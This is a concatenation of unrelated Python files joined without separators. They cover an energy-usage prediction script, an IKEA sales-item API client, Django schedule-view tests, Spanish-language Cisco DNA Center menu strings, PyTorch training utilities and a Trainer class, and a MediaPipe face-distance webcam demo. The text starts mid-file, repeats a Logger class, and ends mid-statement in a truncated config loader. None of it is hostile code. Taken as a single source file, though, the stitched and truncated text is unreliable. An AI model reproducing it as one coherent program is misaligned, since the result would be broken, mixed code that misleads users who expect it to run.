Jul 184.403 # Jun 182.607 # Mar 241.389 # May 143.624 # Nov 240.507 # Oct 177.348 # Sep 168.336 sum_energy_consumption_predicted_per_year = sum_energy_consumption_predicted_per_month.values.sum() #predicted yearly total energy consumption #2463.843 ################################################################################ #For meter ids without full data cycle (no 12 months in the history) #so use similar arhouseholds ################################################################################ #To get usage for the similar meta data families sum_energy_consumption_observed_per_month_per_similar_households_selected =\ sum_energy_consumption_observed_per_month_per_similar_households.merge(sub_df_per_meter_id[meta_data_cols].drop_duplicates(), left_on = meta_data_cols, right_on = meta_data_cols, how='inner').copy() assert(len(sum_energy_consumption_observed_per_month_per_similar_households_selected) > 0 ),"must be data after the inner join!" #Get predictions + auto generated text for yearly aggregations yearly_result = Aux_Energy.generate_yearly_prediction_with_auto_generated_message(sum_energy_consumption_observed_per_year,sum_energy_consumption_predicted_per_year,\ shap_importance_yearly ,cols_that_changing_them_may_influnce_on_energy_consumptions_df, top_n_features ,num_of_observed_unique_months = num_of_observed_unique_months) #List of month names #list_of_month_names = shaply_values_as_DF['month_name'].unique() list_of_month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'] #Get predictions + auto generated text for monthly aggregations monthly_result = Aux_Energy.generate_monthly_prediction_with_auto_generated_message(sum_energy_consumption_observed_per_month , sum_energy_consumption_predicted_per_month,\ sum_energy_consumption_observed_per_month_per_similar_households_selected ,\ cols_that_changing_them_may_influnce_on_energy_consumptions_df.copy(),\ shap_sub_df,top_n_features,conf_obj,x_columns ,list_of_month_names ) #Combine between yearly & monthly yearly_result.extend(monthly_result) yearly_result = [meter_id] + yearly_result yearly_result_df = pd.DataFrame(yearly_result).T return(yearly_result_df) def main(): #Set font size rcParams['figure.figsize'] = 16, 4 #14, 5 #Set configuration object conf_obj = set_config(is_to_plot =True ,is_to_standardize =True ) #Load the data (X_train, X_valid, y_train, y_valid,df_combined,test_data_to_predict,x_columns,cat_features,conf_obj) = Aux_Energy.load_data(path,conf_obj) #Train a model CB_last_model = Aux_Energy.execute_the_modeling_process(X_train, X_valid, y_train, y_valid,test_data_to_predict,x_columns,cat_features,conf_obj) #Shaply + explain the results results_to_submit_df = predict_on_test(X_train,test_data_to_predict, CB_last_model, x_columns , cat_features,conf_obj) #Store the results to csv results_to_submit_df.to_csv("results_to_submit_ver_X.csv",index = False,quoting=csv.QUOTE_NONNUMERIC) if __name__ == "__main__": main() from __future__ import annotations from typing import Any from ikea_api.abc import Endpoint, SessionInfo, endpoint from ikea_api.base_ikea_api import BaseIkeaAPI from ikea_api.error_handlers import ( handle_401, handle_json_decode_error, handle_not_success, ) from ikea_api.exceptions import ItemFetchError class IngkaItems(BaseIkeaAPI): def _get_session_info(self): headers = self._extend_default_headers( { "Accept": "*/*", "Referer": f"{self._const.local_base_url}/order/delivery/", "X-Client-Id": "c4faceb6-0598-44a2-bae4-2c02f4019d06", } ) url = f"https://api.ingka.ikea.com/salesitem/communications/{self._const.country}/{self._const.language}" return SessionInfo(base_url=url, headers=headers) @endpoint(handlers=[handle_json_decode_error, handle_401, handle_not_success]) def get_items(self, item_codes: list[str]) -> Endpoint[dict[str, Any]]: response = yield self._RequestInfo("GET", params={"itemNos": item_codes}) if "error" in response.json: try: msg = response.json["error"]["details"][0]["value"]["keys"] except (KeyError, TypeError, IndexError): msg = None raise ItemFetchError(response, msg) return response.json from django.contrib.auth import get_user_model from django.test import TestCase from django.urls import reverse from symposion.proposals.models import ProposalBase from symposion.schedule.models import Presentation from symposion.schedule.tests.factories import ( SectionFactory, ProposalKindFactory, SlotFactory ) from symposion.speakers.models import Speaker class ScheduleJSONViewTestCase(TestCase): """Automated test cases for schedule_json view.""" def test_empty_schedule(self): """Verify that an empty schedule returns empty JSON.""" response = self.client.get(reverse("schedule_json")) # The JSON should contain an empty element named "schedule". self.assertContains( response=response, text="schedule", status_code=200 ) self.assertEqual(len(response.json()["schedule"]), 0) def test_presentation_count(self): PRESENTATION_COUNT = 5 SlotFactory.create_batch(size=PRESENTATION_COUNT) response = self.client.get(reverse("schedule_json")) self.assertEqual(len(response.json()["schedule"]), PRESENTATION_COUNT) def test_slot_override(self): """Verify that slot.content_override displays in JSON.""" OVERRIDDEN_CONTENT = "**FOOBAR**" slot = SlotFactory() slot.content_override = OVERRIDDEN_CONTENT slot.save() response = self.client.get(reverse("schedule_json")) self.assertContains( response=response, text=OVERRIDDEN_CONTENT, status_code=200 ) def test_presentation_data(self): """Verify that a presentation's content appears.""" TALK_TITLE = "Presentation Content Verification Testing for Snakes" DESCRIPTION_CONTENT = "It was a bright cold day in April..." ABSTRACT_CONTENT = "...the color of television tuned to a dead channel" user_model = get_user_model() user = user_model.objects.create( username="test", email="", first_name="Test", last_name="User", ) speaker = Speaker.objects.create(user=user, name="Speaker") section = SectionFactory() proposal_kind = ProposalKindFactory() # We don't use factories so that all title/description/abstract # information is synchronized between the ProposalBase and the # Presentation. proposal_base = ProposalBase.objects.create( title=TALK_TITLE, description=DESCRIPTION_CONTENT, abstract=ABSTRACT_CONTENT, speaker=speaker, kind=proposal_kind, ) presentation = Presentation.objects.create( title=TALK_TITLE, description=DESCRIPTION_CONTENT, abstract=ABSTRACT_CONTENT, speaker=speaker, proposal_base=proposal_base, section=section, ) slot = SlotFactory() slot.assign(presentation) response = self.client.get(reverse("schedule_json")) self.assertContains(response=response, text=TALK_TITLE) self.assertContains(response=response, text=DESCRIPTION_CONTENT) self.assertContains(response=response, text=ABSTRACT_CONTENT) enauto/enauto_gui_dnac_menus_ebo.py #--------------------DNAC MENUS NIVEL 1----------------------------- DNAC_L1_MENU="""Estás usando DNA CENTER SANDBOX ALWAYS ON 1) SANDBOX DNAC2 (https://sandboxdnac2.cisco.com) "USER ESTE MEJOR" 2) SANDBOX DNAC (https://sandboxdnac.cisco.com) "ESTÁ MIGRANDO AL 2" ¿Que opción deseas usar?""" #--------------------DNAC MENUS NIVEL 2----------------------------- DNAC_L2_MENU="""Estás usando DNA CENTER SANDBOX ALWAYS ON 1) POST FOR AUTHENTICATION (POST /system/api/v1/auth/token) 2) SITE MENU 3) TOPOLOGY MENU 4) DEVICES MENU 5) CLIENTS MENU 6) CONFIG TEMPLATES MENU 7) COMMAND RUNNER MENU 8) NETWORK DISCOVERY MENU 9) PATH TRACE MENU A) TASK MENU B) FILE MENU C) EVENT MENU ¿Que opción deseas usar?""" #--------------------DNAC MENUS NIVEL 3 ----------------------------- DNAC_SITE_MENU="""Estás usando SITE API 1) GET SITE (GET /intent/api/v1/site) 2) GET SITE HEALTH (GET /intent/api/v1/site-health?timestamp="1612209600000") ¿Que opción deseas usar?""" DNAC_TOPOLOGY_MENU="""Estás usando TOPOLOGY API 1) GET FOR PHYSICAL TOPOLOGY (GET /intent/api/v1/topology/physical-topology) 2) GET FOR SITE TOPOLOGY (GET /intent/api/v1/topology/site-topology) ¿Que opción deseas usar?""" DNAC_DEVICES_MENU="""Estás usando DEVICE API 1) GET FOR NETWORK DEVICES (GET /intent/api/v1/network-device) 2) GET FOR INTERFACES (GET /intent/api/v1/interface) ¿Que opción deseas usar?""" DNAC_CLIENTS_MENU="""Estás usando CLIENTS API 1) GET CLIENTS HEALTH (GET /intent/api/v1/client-health?timestamp="1612209600000") 2) GET CLIENT ENRICHMENT DETAILS (GET /dna/intent/api/v1/client-enrichment-details) (se requiere una mac, pero no hay usuarios) 3) GET ISSUES ENRICHMENT DETAILS (GET /dna/intent/api/v1/issue-enrichment-details) (se requiere una mac, pero no hay usuarios) ¿Que opción deseas usar?""" DNAC_CONFIG_TEMPLATES_MENU="""Estás usando COMMAND RUNNER API 1) GET FOR PROJECT LIST (GET /intent/api/v1/template-programmer/project) 2) GET FOR TEMPLATE LIST (GET /intent/api/v1/template-programmer/template) 3) GET FOR TEMPLATE DETAILS (GET /intent/api/v1/template-programmer/template/{templateId}) 4) POST FOR A NEW TEMPLATE (POST /intent/api/v1/template-programmer/project/{projectId}/template) (FALTA DISEÑAR EL BODY) 5) DEPLOY FOR A TEMPLATE (POST /intent/api/v1/template-programmer/template/deploy) (BAD REQUEST) 6) GET FOR TEMPLATE DEPLOY STATUS (GET /v1/template-programmer/template/deploy/status/deploymentId) (FALTA EL ANTERIOR) ¿Que opción deseas usar?""" DNAC_COMMAND_RUNNER_MENU="""Estás usando COMMAND RUNNER API 1) GET FOR LEGIT READS (GET /intent/api/v1/network-device-poller/cli/legit-reads) 2) POST FOR COMMAND (POST /intent/api/v1/network-device-poller/cli/read-request) ¿Que opción deseas usar?""" DNAC_NETWORK_DISCOVERY_MENU="""Estás usando NETWORK DISCOVERY API 1) GET FOR DISCOVERY COUNTS (GET /intent/api/v1/discovery/count) 2) GET FOR DISCOVERY LIST (GET /intent/api/v1/discovery/1/"+str(count)) 3) GET FOR DISCOVERY SUMMARY (GET /intent/api/v1/discovery/3206/summary) ¿Que opción deseas usar?""" DNAC_PATH_TRACE_MENU="""Estás usando PATH TRACE API 1) POST FOR PATH TRACE (POST /intent/api/v1/flow-analysis) 2) GET FOR FLOW ANALYSIS (GET /intent/api/v1/flow-analysis) (ALGO PASA CON ESTE GET) 3) GET FOR FLOW ANALYSIS WITH ID (GET /intent/api/v1/flow-analysis/{flowAnalysisId}) 4) DELETE FOR FLOW ANALYSIS WITH ID (DELETE /intent/api/v1/flow-analysis/{flowAnalysisId} ¿Que opción deseas usar?""" DNAC_TASK_MENU="""Estás usando TASK API 1) GET FOR TASK LIST (GET /intent/api/v1/task) 2) GET FOR TASK BY ID (GET /intent/api/v1/task/taskId) ¿Que opción deseas usar?""" DNAC_FILE_MENU="""Estás usando FILE API 1) GET FOR NAMESPACE LIST (GET /intent/api/v1/namespace) 2) GET FOR FILES BY NAMESPACE (GET /intent/api/v1/namespace/nameSpace) 3) GET FOR FILE BY FILE ID (GET /intent/api/v1/files/fileId) ¿Que opción deseas usar?""" DNAC_EVENT_MENU="""Estás usando EVENT API 1) GET FOR EVENTS (GET /intent/api/v1/events?tags=ASSURANCE) 2) GET FOR EVENT SUBSCRIPTION (GET /intent/api/v1/event/subscription) 3) GET FOR EVENT NOTIFICATIONS (GET /intent/api/v1/event/event-series (NO HAY NOTIFICACIONES) 4) POST FOR EVENT SUBSCRIPTION (POST /intent/api/v1/event/subscription) (NO HAY PERMISO) ¿Que opción deseas usar?"""import torch import numpy as np import pickle import os from datetime import datetime import glob import re import matplotlib.pyplot as plt plt.switch_backend('agg') from collections import deque from tqdm import tqdm from torchvision import transforms import sys ap_impl_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../CATER-SSL/external_lib/average-precision/python/') # noQA sys.path.insert(0, ap_impl_path) from ap import compute_multiple_aps class HiddenPrints: def __enter__(self): self._original_stdout = sys.stdout sys.stdout = open(os.devnull, 'w') def __exit__(self, exc_type, exc_val, exc_tb): sys.stdout.close() sys.stdout = self._original_stdout def blockPrint(func): def func_wrapper(*args, **kwargs): with HiddenPrints(): value = func(*args, **kwargs) return value return func_wrapper def save_checkpoint(state, is_best=0, gap=1, filename='models/checkpoint.pth.tar', keep_all=False): torch.save(state, filename) last_epoch_path = os.path.join(os.path.dirname(filename), 'epoch%s.pth.tar' % str(state['epoch']-gap)) if not keep_all: try: os.remove(last_epoch_path) except: pass if is_best: past_best = glob.glob(os.path.join(os.path.dirname(filename), 'model_best_*.pth.tar')) for i in past_best: try: os.remove(i) except: pass torch.save(state, os.path.join(os.path.dirname(filename), 'model_best_epoch%s.pth.tar' % str(state['epoch']))) def write_log(content, epoch, filename): if not os.path.exists(filename): log_file = open(filename, 'w') else: log_file = open(filename, 'a') log_file.write('## Epoch %d:\n' % epoch) log_file.write('time: %s\n' % str(datetime.now())) log_file.write(content + '\n\n') log_file.close() class Logger(object): '''write something to txt file''' def __init__(self, path): self.birth_time = datetime.now() filepath = os.path.join(path, self.birth_time.strftime('%Y-%m-%d-%H:%M:%S')+'.log') self.filepath = filepath with open(filepath, 'a') as f: f.write(self.birth_time.strftime('%Y-%m-%d %H:%M:%S')+'\n') def log(self, string): with open(self.filepath, 'a') as f: time_stamp = datetime.now() - self.birth_time f.write(strfdelta(time_stamp,"{d}-{h:02d}:{m:02d}:{s:02d}")+'\t'+string+'\n') def calc_topk_accuracy(output, target, topk=(1,)): ''' Modified from: https://gist.github.com/agermanidis/275b23ad7a10ee89adccf021536bb97e Given predicted and ground truth labels, calculate top-k accuracies. ''' if len(target.shape) > 1 and target.shape[1] != 1: return compute_map(target.detach().cpu(), torch.sigmoid(output).detach().cpu()) maxk = max(topk) batch_size = target.size(0) _, pred = output.topk(maxk, 1, True, True) pred = pred.t() correct = pred.eq(target.view(1, -1).expand_as(pred)).contiguous() res = [] for k in topk: correct_k = correct[:k].view(-1).float().sum(0) res.append(correct_k.mul_(1 / batch_size)) return res @blockPrint def compute_map(labels, preds): ap = compute_multiple_aps(labels, preds) map = np.mean([el for el in ap if el >= 0]) return map def calc_accuracy(output, target): '''output: (B, N); target: (B)''' if len(target.shape) == 1 or target.shape[1] == 1: target = target.squeeze() _, pred = torch.max(output, 1) return torch.mean((pred == target).float()) else: output = torch.sigmoid(output) print(torch.mean((((output > 0.5).float() - (target > 0.5).float())[target > 0.5]).float())) #return torch.mean((((output > 0.5).float() - (target > 0.5).float()).sum(1) == 0).float()) mAP = compute_map(target.detach().cpu(), output.detach().cpu()) return torch.FloatTensor([mAP]) def denorm(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]): assert len(mean)==len(std)==3 inv_mean = [-mean[i]/std[i] for i in range(3)] inv_std = [1/i for i in std] return transforms.Normalize(mean=inv_mean, std=inv_std) def neq_load_customized(model, pretrained_dict): ''' load pre-trained model in a not-equal way, when new model has been partially modified ''' model_dict = model.state_dict() tmp = {} print('\n=======Check Weights Loading======') print('Weights not used from pretrained file:') for k, v in pretrained_dict.items(): if k in model_dict: tmp[k] = v else: print(k) print('---------------------------') print('Weights not loaded into new model:') for k, v in model_dict.items(): if k not in pretrained_dict: print(k) print('===================================\n') # pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict} del pretrained_dict model_dict.update(tmp) del tmp model.load_state_dict(model_dict) return model class AverageMeter(object): """Computes and stores the average and current value""" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count = 0 self.local_history = deque([]) self.local_avg = 0 self.history = [] self.dict = {} # save all data values here self.save_dict = {} # save mean and std here, for summary table def update(self, val, n=1, history=0, step=5): self.val = val self.sum += val * n self.count += n self.avg = self.sum / self.count if history: self.history.append(val) if step > 0: self.local_history.append(val) if len(self.local_history) > step: self.local_history.popleft() self.local_avg = np.average(self.local_history) def dict_update(self, val, key): if key in self.dict.keys(): self.dict[key].append(val) else: self.dict[key] = [val] def __len__(self): return self.count class AccuracyTable(object): '''compute accuracy for each class''' def __init__(self): self.dict = {} def update(self, pred, tar): pred = torch.squeeze(pred) tar = torch.squeeze(tar) for i, j in zip(pred, tar): i = int(i) j = int(j) if j not in self.dict.keys(): self.dict[j] = {'count':0,'correct':0} self.dict[j]['count'] += 1 if i == j: self.dict[j]['correct'] += 1 def print_table(self, label): for key in self.dict.keys(): acc = self.dict[key]['correct'] / self.dict[key]['count'] print('%s: %2d, accuracy: %3d/%3d = %0.6f' \ % (label, key, self.dict[key]['correct'], self.dict[key]['count'], acc)) class ConfusionMeter(object): '''compute and show confusion matrix''' def __init__(self, num_class): self.num_class = num_class self.mat = np.zeros((num_class, num_class)) self.precision = [] self.recall = [] def update(self, pred, tar): pred, tar = pred.cpu().numpy(), tar.cpu().numpy() pred = np.squeeze(pred) tar = np.squeeze(tar) for p,t in zip(pred.flat, tar.flat): self.mat[p][t] += 1 def print_mat(self): print('Confusion Matrix: (target in columns)') print(self.mat) def plot_mat(self, path, dictionary=None, annotate=False): plt.figure(dpi=600) plt.imshow(self.mat, cmap=plt.cm.jet, interpolation=None, extent=(0.5, np.shape(self.mat)[0]+0.5, np.shape(self.mat)[1]+0.5, 0.5)) width, height = self.mat.shape if annotate: for x in range(width): for y in range(height): plt.annotate(str(int(self.mat[x][y])), xy=(y+1, x+1), horizontalalignment='center', verticalalignment='center', fontsize=8) if dictionary is not None: plt.xticks([i+1 for i in range(width)], [dictionary[i] for i in range(width)], rotation='vertical') plt.yticks([i+1 for i in range(height)], [dictionary[i] for i in range(height)]) plt.xlabel('Ground Truth') plt.ylabel('Prediction') plt.colorbar() plt.tight_layout() plt.savefig(path, format='svg') plt.clf() for i in range(width): if np.sum(self.mat[i,:]) != 0: self.precision.append(self.mat[i,i] / np.sum(self.mat[i,:])) if np.sum(self.mat[:,i]) != 0: self.recall.append(self.mat[i,i] / np.sum(self.mat[:,i])) print('Average Precision: %0.4f' % np.mean(self.precision)) print('Average Recall: %0.4f' % np.mean(self.recall)) def MultiStepLR_Restart_Multiplier(epoch, gamma=0.1, step=[10,15,20], repeat=3): '''return the multipier for LambdaLR, 0 <= ep < 10: gamma^0 10 <= ep < 15: gamma^1 15 <= ep < 20: gamma^2 20 <= ep < 30: gamma^0 ... repeat 3 cycles and then keep gamma^2''' max_step = max(step) effective_epoch = epoch % max_step if epoch // max_step >= repeat: exp = len(step) - 1 else: exp = len([i for i in step if effective_epoch>=i]) return gamma ** exp def strfdelta(tdelta, fmt): d = {"d": tdelta.days} d["h"], rem = divmod(tdelta.seconds, 3600) d["m"], d["s"] = divmod(rem, 60) return fmt.format(**d) class Logger(object): '''write something to txt file''' def __init__(self, path): self.birth_time = datetime.now() filepath = os.path.join(path, self.birth_time.strftime('%Y-%m-%d-%H:%M:%S')+'.log') self.filepath = filepath with open(filepath, 'a') as f: f.write(self.birth_time.strftime('%Y-%m-%d %H:%M:%S')+'\n') def log(self, string): with open(self.filepath, 'a') as f: time_stamp = datetime.now() - self.birth_time f.write(strfdelta(time_stamp,"{d}-{h:02d}:{m:02d}:{s:02d}")+'\t'+string+'\n') lib/trainer.py import os import time import glob import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from .utils import get_latest_file, iterate_minibatches, check_numpy, process_in_chunks from .nn_utils import to_one_hot from collections import OrderedDict from copy import deepcopy from tensorboardX import SummaryWriter from apex import amp import json from os.path import join as pjoin, exists as pexists import argparse from torch.optim.lr_scheduler import CosineAnnealingWarmRestarts from sklearn.metrics import roc_auc_score, log_loss from . import nn_utils, arch class Trainer(nn.Module): def __init__(self, model, experiment_name=None, warm_start=False, Optimizer=torch.optim.Adam, optimizer_params={}, lr=0.01, lr_warmup_steps=-1, verbose=False, n_last_checkpoints=1, step_callbacks=[], fp16=0, problem='classification', pretraining_ratio=0.15, masks_noise=0.1, opt_only_last_layer=False, freeze_steps=0, **kwargs): """ :type model: torch.nn.Module :param experiment_name: a path where all logs and checkpoints are saved :param warm_start: when set to True, loads last checpoint :param Optimizer: function(parameters) -> optimizer :param verbose: when set to True, produces logging information :param problem : str Problem type. Chosen from ['classification', 'regression', 'pretrain'] :param pretraining_ratio : float Between 0 and 1, percentage of feature to mask for reconstruction. Only used when problem == 'pretrain' """ super().__init__() self.model = model self.verbose = verbose self.lr = lr self.lr_warmup_steps = lr_warmup_steps # When using fp16, there are some params if not filtered out by requires_grad # will produce error params = [p for p in self.model.parameters() if p.requires_grad] if opt_only_last_layer: print('Only optimize last layer!') params = [self.model.last_w] self.opt = Optimizer(params, lr=lr, **optimizer_params) self.step = 0 self.n_last_checkpoints = n_last_checkpoints self.step_callbacks = step_callbacks self.fp16 = fp16 self.problem = problem self.pretraining_ratio = pretraining_ratio self.masks_noise = masks_noise self.opt_only_last_layer = opt_only_last_layer self.freeze_steps = freeze_steps if problem.startswith('pretrain'): # Don't do freeze when pretraining self.freeze_steps = 0 if problem == 'classification': # In my datasets I only have binary classification self.loss_function = \ (lambda x, y: F.binary_cross_entropy_with_logits(x, y.float())) elif problem == 'regression': self.loss_function = F.mse_loss elif problem.startswith('pretrain'): # Not used self.loss_function = None else: raise NotImplementedError() if experiment_name is None: experiment_name = 'untitled_{}.{:0>2d}.{:0>2d}_{:0>2d}:{:0>2d}'.format(*time.gmtime()[:5]) if self.verbose: print('using automatic experiment name: ' + experiment_name) self.experiment_path = pjoin('logs/', experiment_name) # if not warm_start and experiment_name != 'debug': # assert not os.path.exists(self.experiment_path), 'experiment {} already exists'.format(experiment_name) # self.writer = SummaryWriter(self.experiment_path, comment=experiment_name) if fp16: self.model, self.opt = amp.initialize( self.model, self.opt, opt_level='O1') if warm_start: self.load_checkpoint() def save_checkpoint(self, tag=None, path=None, mkdir=True, **kwargs): assert tag is None or path is None, "please provide either tag or path or nothing, not both" if tag is None and path is None: tag = "temp_{}".format(self.step) if path is None: path = pjoin(self.experiment_path, "checkpoint_{}.pth".format(tag)) if mkdir: os.makedirs(os.path.dirname(path), exist_ok=True) # Sometimes happen there is a checkpoint already existing. Then overwrite! if pexists(path): os.remove(path) torch.save(OrderedDict([ ('model', self.model.state_dict(**kwargs)), ('opt', self.opt.state_dict()), ('step', self.step), ] + ([] if not self.fp16 else [('amp', amp.state_dict())])), path) if self.verbose: print("Saved " + path) return path def load_checkpoint(self, tag=None, path=None, **kwargs): assert tag is None or path is None, "please provide either tag or path or nothing, not both" if tag is None and path is None: path = self.get_latest_file(pjoin(self.experiment_path, 'checkpoint_temp_[0-9]*.pth')) if path is None: return self elif tag is not None and path is None: path = pjoin(self.experiment_path, "checkpoint_{}.pth".format(tag)) checkpoint = torch.load(path) self.model.load_state_dict(checkpoint['model'], **kwargs) self.opt.load_state_dict(checkpoint['opt']) self.step = int(checkpoint['step']) if self.fp16 and 'amp' in checkpoint: amp.load_state_dict(checkpoint['amp']) # Set the temperature for c in self.step_callbacks: c(self.step) if self.verbose: print('Loaded ' + path) return self def get_latest_file(self, pattern): path = get_latest_file(pattern) if path is None: return None # File not saved correctly if os.stat(path).st_size == 0 \ or len(glob.glob(pattern)) > self.n_last_checkpoints: os.remove(path) path = self.get_latest_file(pattern) return path def average_checkpoints(self, tags=None, paths=None, out_tag='avg', out_path=None): assert tags is None or paths is None, "please provide either tags or paths or nothing, not both" assert out_tag is not None or out_path is not None, "please provide either out_tag or out_path or both, not nothing" if tags is None and paths is None: paths = self.get_latest_checkpoints( pjoin(self.experiment_path, 'checkpoint_temp_[0-9]*.pth'), self.n_last_checkpoints) elif tags is not None and paths is None: paths = [pjoin(self.experiment_path, 'checkpoint_{}.pth'.format(tag)) for tag in tags] checkpoints = [torch.load(path) for path in paths] averaged_ckpt = deepcopy(checkpoints[0]) for key in averaged_ckpt['model']: values = [ckpt['model'][key] for ckpt in checkpoints] averaged_ckpt['model'][key] = sum(values) / len(values) if out_path is None: out_path = pjoin(self.experiment_path, 'checkpoint_{}.pth'.format(out_tag)) torch.save(averaged_ckpt, out_path) def get_latest_checkpoints(self, pattern, n_last=None): list_of_files = glob.glob(pattern) if len(list_of_files) == 0: return [] assert len(list_of_files) > 0, "No files found: " + pattern return sorted(list_of_files, key=os.path.getctime, reverse=True)[:n_last] def remove_old_temp_checkpoints(self, number_ckpts_to_keep=None): if number_ckpts_to_keep is None: number_ckpts_to_keep = self.n_last_checkpoints paths = self.get_latest_checkpoints(pjoin(self.experiment_path, 'checkpoint_temp_[0-9]*.pth')) paths_to_delete = paths[number_ckpts_to_keep:] for ckpt in paths_to_delete: os.remove(ckpt) def train_on_batch(self, *batch, device, update=True): # Tune temperature in choice function for c in self.step_callbacks: c(self.step) # Tune the learning rate if self.lr_warmup_steps > 0 and self.step < self.lr_warmup_steps: cur_lr = self.lr * (self.step + 1) / self.lr_warmup_steps self.set_lr(cur_lr) if self.freeze_steps > 0 and self.step == 0 and update: self.model.freeze_all_but_lastw() if 0 < self.freeze_steps == self.step: self.model.unfreeze() x_batch, y_batch = batch x_batch = torch.as_tensor(x_batch, device=device) if not self.problem.startswith('pretrain'): # Save some memory y_batch = torch.as_tensor(y_batch, device=device) self.model.train() # Read that it's faster... for group in self.opt.param_groups: for p in group['params']: p.grad = None # self.opt.zero_grad() if not self.problem.startswith('pretrain'): # Normal training logits, penalty = self.model(x_batch, return_outputs_penalty=True) loss = self.loss_function(logits, y_batch).mean() else: x_masked, masks, masks_noise = self.mask_input(x_batch) feature_masks = masks_noise if self.problem == 'pretrain_recon2' else None outputs, penalty = self.model(x_masked, return_outputs_penalty=True, feature_masks=feature_masks) loss = self.pretrain_loss(outputs, masks, x_batch) loss += penalty if self.fp16: with amp.scale_loss(loss, self.opt) as scaled_loss: scaled_loss.backward() else: loss.backward() if update: self.opt.step() self.step += 1 # self.writer.add_scalar('train loss', loss.item(), self.step) return {'loss': loss.item()} def mask_input(self, x_batch): masks = torch.bernoulli( self.pretraining_ratio * torch.ones(x_batch.shape) ).to(x_batch.device) infills = 0. # if self.problem == 'pretrain_mask': # # Use marginal dist (Gaussian) to in-fill. # infills = torch.normal(0, 1, size=masks.shape).to(x_batch.device) # To make it more difficult, 10% of the time we do not mask the inputs! # Similar to BERT tricks. new_masks = masks if self.masks_noise > 0.: new_masks = torch.bernoulli((1. - self.masks_noise) * masks) x_batch = (1. - new_masks) * x_batch + new_masks * infills return x_batch, masks, new_masks def pretrain_loss(self, outputs, masks, targets): if self.problem.startswith('pretrain_recon'): nb_masks = torch.sum(masks, dim=1, keepdim=True) nb_masks[nb_masks == 0] = 1 loss = (((outputs - targets) * masks) ** 2) / nb_masks loss = torch.mean(loss) # elif self.problem == 'pretrain_mask': # # BCE loss to predict if that token is the mask. And set target as 0.9 # loss = F.binary_cross_entropy_with_logits( # outputs, (1. - self.masks_noise) * masks) else: raise NotImplementedError('Unknown problem: ' + self.problem) return loss def evaluate_pretrain_loss(self, X_test, y_test, device, batch_size=4096): X_test = torch.as_tensor(X_test, device=device) self.model.train(False) with torch.no_grad(): if self.problem.startswith('pretrain_recon'): # no mask outputs = process_in_chunks(self.model, X_test, batch_size=batch_size) loss = (((outputs - X_test)) ** 2) loss = torch.mean(loss) # elif self.problem == 'pretrain_mask': # X_masked, masks, _ = self.mask_input(X_test) # outputs = process_in_chunks(self.model, X_masked, batch_size=batch_size) # loss = self.pretrain_loss(outputs, masks, X_test) else: raise NotImplementedError('Unknown problem: ' + self.problem) return loss.item() def evaluate_classification_error(self, X_test, y_test, device, batch_size=4096): ''' This is for evaluation of binary error ''' X_test = torch.as_tensor(X_test, device=device) y_test = check_numpy(y_test) self.model.train(False) with torch.no_grad(): logits = process_in_chunks(self.model, X_test, batch_size=batch_size) logits = check_numpy(logits) error_rate = (y_test != (logits >= 0)).mean() # error_rate = (y_test != np.argmax(logits, axis=1)).mean() return error_rate def evaluate_negative_auc(self, X_test, y_test, device, batch_size=4096): X_test = torch.as_tensor(X_test, device=device) y_test = check_numpy(y_test) self.model.train(False) with torch.no_grad(): logits = process_in_chunks(self.model, X_test, batch_size=batch_size) logits = check_numpy(logits) # assert logits.shape[1] == 2, 'logits shape is not binary! %d' % logits.shape[1] # logit_diff = logits[:, 1] - logits[:, 0] auc = roc_auc_score(y_test, logits) return -auc def evaluate_mse(self, X_test, y_test, device, batch_size=4096): X_test = torch.as_tensor(X_test, device=device) y_test = check_numpy(y_test) self.model.train(False) with torch.no_grad(): prediction = process_in_chunks(self.model, X_test, batch_size=batch_size) prediction = check_numpy(prediction) error_rate = ((y_test - prediction) ** 2).mean() error_rate = float(error_rate) # To avoid annoying JSON unserializable bug return error_rate def evaluate_multiple_mse(self, X_test, y_test, device, batch_size=4096): X_test = torch.as_tensor(X_test, device=device) y_test = check_numpy(y_test) self.model.train(False) with torch.no_grad(): prediction = process_in_chunks(self.model, X_test, batch_size=batch_size) prediction = check_numpy(prediction) error_rate = ((y_test - prediction) ** 2).mean(axis=0) return error_rate.astype(float).tolist() def evaluate_logloss(self, X_test, y_test, device, batch_size=512): X_test = torch.as_tensor(X_test, device=device) y_test = check_numpy(y_test) self.model.train(False) with torch.no_grad(): logits = F.softmax(process_in_chunks(self.model, X_test, batch_size=batch_size), dim=1) logits = check_numpy(logits) y_test = torch.tensor(y_test) logloss = log_loss(check_numpy(to_one_hot(y_test)), logits) logloss = float(logloss) # To avoid annoying JSON unserializable bug return logloss def decrease_lr(self, ratio=0.1, min_lr=1e-6): if self.lr <= min_lr: return self.lr *= ratio if self.lr < min_lr: self.lr = min_lr self.set_lr(self.lr) def set_lr(self, lr): for g in self.opt.param_groups: g['lr'] = lr # exemple print ("hello revision python")# %% # live demo import cv2 import mediapipe as mp import utilities mp_drawing = mp.solutions.drawing_utils mp_face_mesh = mp.solutions.face_mesh # For webcam input: drawing_spec = mp_drawing.DrawingSpec(thickness=1, circle_radius=1) cap = cv2.VideoCapture(0) with mp_face_mesh.FaceMesh( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as face_mesh: while cap.isOpened(): success, image = cap.read() if not success: print("Ignoring empty camera frame.") # If loading a video, use 'break' instead of 'continue'. continue # Flip the image horizontally for a later selfie-view display, and convert # the BGR image to RGB. image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB) # To improve performance, optionally mark the image as not writeable to # pass by reference. image.flags.writeable = False results = face_mesh.process(image) # Draw the face mesh annotations on the image. image.flags.writeable = True image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) if results.multi_face_landmarks: landmarks = utilities.get_avg_landmarks_from_results( results, utilities.UNIQUE_EYE_COORDINATES ) image = utilities.add_landmarks_to_image(image, landmarks) distance = utilities.get_eye_distance(landmarks) image = utilities.add_distance_to_image(image, distance) cv2.imshow("Face distance", image) if cv2.waitKey(5) & 0xFF == 27: break results = face_mesh.process(image) cap.release() #!/usr/bin/env python import numpy as np import matplotlib.pyplot as plt import json import os import yaml FOLD = 0 config = yaml.load(open( "~/Machine-Learning/config/MSSM_HWW.yaml", "r")) # load testing data x_test = np.load( 